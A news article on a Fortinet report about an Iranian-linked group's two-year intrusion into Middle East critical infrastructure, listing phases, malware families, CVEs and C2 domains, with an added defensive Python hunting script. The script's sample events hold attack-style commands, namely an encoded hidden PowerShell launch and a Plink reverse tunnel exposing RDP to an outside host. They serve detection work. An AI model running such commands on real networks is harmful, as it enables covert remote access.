An Iranian state-sponsored threat group has been linked to a long-term cyber intrusion targeting critical national infrastructure (CNI) in the Middle East that lasted nearly two years.
The activity, which ran from at least May 2023 to February 2025, included "extensive espionage operations and suspected network prepositioning, a tactic often used to maintain persistent access for future strategic advantage," Fortinet said in a report.
The network security company noted that the attack exhibits tradecraft overlaps with a known Iranian nation-state threat actor tracked as Lemon Sandstorm (formerly Rubidium), which is also known as Parisite, Pioneer Kitten, and UNC757.
Active since at least 2017, the group has targeted the aerospace, oil and gas, water, and electricity sectors across the Middle East, Europe, and Australia. According to industrial cybersecurity company Dragos, the adversary has exploited known security flaws in virtual private network (VPN) appliances from Fortinet, Pulse Secure, and Palo Alto Networks to gain initial access.
Last year, U.S. cybersecurity and intelligence agencies implicated Lemon Sandstorm in ransomware deployments against entities in the U.S., Israel, Azerbaijan, and the United Arab Emirates.
The attacks analyzed by Fortinet against the CNI entity unfolded in four stages starting in May 2023, with the intruders switching to new tooling each time the victim enacted countermeasures.
- May 15, 2023 – April 29, 2024 – Use stolen login credentials to access the victim's SSL VPN, drop web shells on public-facing servers, and establish a foothold by deploying three backdoors, Havoc, HanifNet, and HXLibrary, for long-term access
- April 30, 2024 – November 22, 2024 – Consolidate the foothold by planting more web shells and an additional backdoor called NeoExpressRAT, burrow deeper into the network using tools like Plink and ngrok, carry out targeted exfiltration of the victim's emails, and move laterally into the virtualization infrastructure
- November 23, 2024 – December 13, 2024 – Deploy more web shells and two backdoors, MeshCentral Agent and SystemBC, in response to the initial containment and remediation steps taken by the victim
- December 14, 2024 – Present – Attempt to re-enter the network by exploiting known Biotime vulnerabilities (CVE-2023-38950, CVE-2023-38951, and CVE-2023-38952)
It's worth noting that Havoc and MeshCentral are both open-source tools, functioning as a command-and-control (C2) framework and as remote monitoring and management (RMM) software, respectively. SystemBC, on the other hand, is commodity malware that often serves as a precursor to ransomware deployment.
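To make the second-phase tradecraft described above concrete, the following is an added detection example written for this page; it is not Fortinet's code and does not come from the report. It runs three hunting rules over constructed Sysmon-style process-creation events: shells or LOLBins spawned by the IIS worker process (the usual footprint of a web shell executing operator commands), Plink or ngrok launched with tunnelling arguments, and hosts on which more than one tunnelling tool appears, which is the proxy chaining the report describes. The host names, file paths, command lines, and the list of flagged child processes are assumptions for illustration.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (Event ID 1), not taken
# from the incident: (host, parent_image, image, command_line).
EVENTS = [
    ("WEB01", r"C:\Windows\System32\inetsrv\w3wp.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ("WEB01", r"C:\Windows\System32\inetsrv\w3wp.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ("WEB01", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\inetpub\wwwroot\web.config"),
    ("APP02", r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\plink.exe",
     "plink.exe -N -R 0.0.0.0:8443:127.0.0.1:3389 -l tunnel -pw hunter2 203.0.113.10"),
    ("APP02", r"C:\Windows\System32\cmd.exe", r"C:\ProgramData\ngrok.exe",
     "ngrok.exe tcp 3389"),
    ("DB03", r"C:\Windows\System32\cmd.exe", r"C:\Tools\plink.exe",
     "plink.exe -ssh admin@10.0.0.5"),  # plain SSH session, no port-forward flags
]

IIS_WORKER = "w3wp.exe"
# Child processes that an IIS worker has no business spawning (editor's list).
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "certutil.exe", "bitsadmin.exe"}

# Tool names match case-insensitively; the Plink flags stay case-sensitive so
# that "-l <user>" is not confused with "-L" (local forward).
TUNNEL_PATTERNS = {
    "plink": re.compile(r"\b(?i:plink(?:\.exe)?)\b.*\s-[RLD]\b"),      # -R/-L/-D forwards
    "ngrok": re.compile(r"\b(?i:ngrok(?:\.exe)?)\s+(?i:tcp|http|tls|start)\b"),
}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def detect_web_shell_children(events):
    """Flag shells/LOLBins spawned by the IIS worker process."""
    findings = []
    for host, parent, image, cmdline in events:
        if basename(parent) == IIS_WORKER and basename(image) in SHELL_CHILDREN:
            findings.append((host, "web_shell_child", cmdline))
    return findings


def detect_tunnel_tools(events):
    """Flag Plink/ngrok invoked with tunnelling arguments."""
    findings = []
    for host, _parent, _image, cmdline in events:
        for tool, pattern in TUNNEL_PATTERNS.items():
            if pattern.search(cmdline):
                findings.append((host, f"tunnel_tool:{tool}", cmdline))
    return findings


def detect_proxy_chaining(tunnel_findings):
    """Hosts running two or more distinct tunnelling tools: one proxy may be an
    admin oddity, several on the same box looks like chained proxies."""
    tools_by_host = defaultdict(set)
    for host, rule, _cmdline in tunnel_findings:
        tools_by_host[host].add(rule.split(":", 1)[1])
    return {host: sorted(tools) for host, tools in tools_by_host.items()
            if len(tools) >= 2}


def hunt(events):
    """Run all rules and return the findings grouped by rule."""
    tunnels = detect_tunnel_tools(events)
    return {
        "web_shell_children": detect_web_shell_children(events),
        "tunnel_tools": tunnels,
        "proxy_chaining": detect_proxy_chaining(tunnels),
    }


if __name__ == "__main__":
    for rule, hits in hunt(EVENTS).items():
        print(rule)
        for hit in (hits.items() if isinstance(hits, dict) else hits):
            print("   ", hit)
```

On the constructed data the web-shell rule fires twice on WEB01, the tunnel rule fires for Plink and ngrok on APP02 but not for the plain SSH session on DB03, and APP02 is the only host reported for proxy chaining. The rule set is deliberately narrow, covering only the two tunnelling tools the article names; in a real hunt the same structure would be fed from a SIEM query rather than an inline list.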

Below is a brief description of the custom malware families used in the attack:
- HanifNet – An unsigned .NET executable that can retrieve and execute commands from a C2 server (first deployed in August 2023)
- HXLibrary – A malicious IIS module written in .NET that is designed to retrieve three identical text files hosted on Google Docs to obtain the C2 server and issue web requests to it (first deployed in October 2023)
- CredInterceptor – A DLL-based tool that can harvest credentials from the Windows Local Security Authority Subsystem Service (LSASS) process memory (first deployed in November 2023)
- RemoteInjector – A loader component used to run next-stage payloads like Havoc (first deployed in April 2024)
- RecShell – A web shell used for initial reconnaissance (first deployed in April 2024)
- NeoExpressRAT – A backdoor that retrieves a configuration from the C2 server and likely uses Discord for follow-on communications (first deployed in August 2024)
- DropShell – A web shell with basic file upload functionality (first deployed in November 2024)
- DarkLoadLibrary – An open-source loader used to launch SystemBC (first deployed in December 2024)
The link to Lemon Sandstorm stems from the C2 infrastructure – apps.gist.githubapp(.)net and gupdate(.)net.
Fortinet said the victim's restricted operational technology (OT) network was a key target of the attack, based on the threat actor's extensive reconnaissance and its breach of a network segment hosting OT-adjacent systems. That said, there is no evidence that the adversary penetrated the OT network.
A majority of the malicious activity is assessed to be hands-on-keyboard operations carried out by different individuals, given the command errors and consistent working schedule. Furthermore, a deeper investigation into the incident revealed that the threat actors may have had access to the network as early as May 15, 2021.
"Throughout the intrusion, the attacker leveraged chained proxies and custom implants to bypass network segmentation and move laterally within the environment," the company said. "In later stages, they consistently chained four different proxy tools to access internal network segments, demonstrating a sophisticated approach to maintaining persistence and avoiding detection."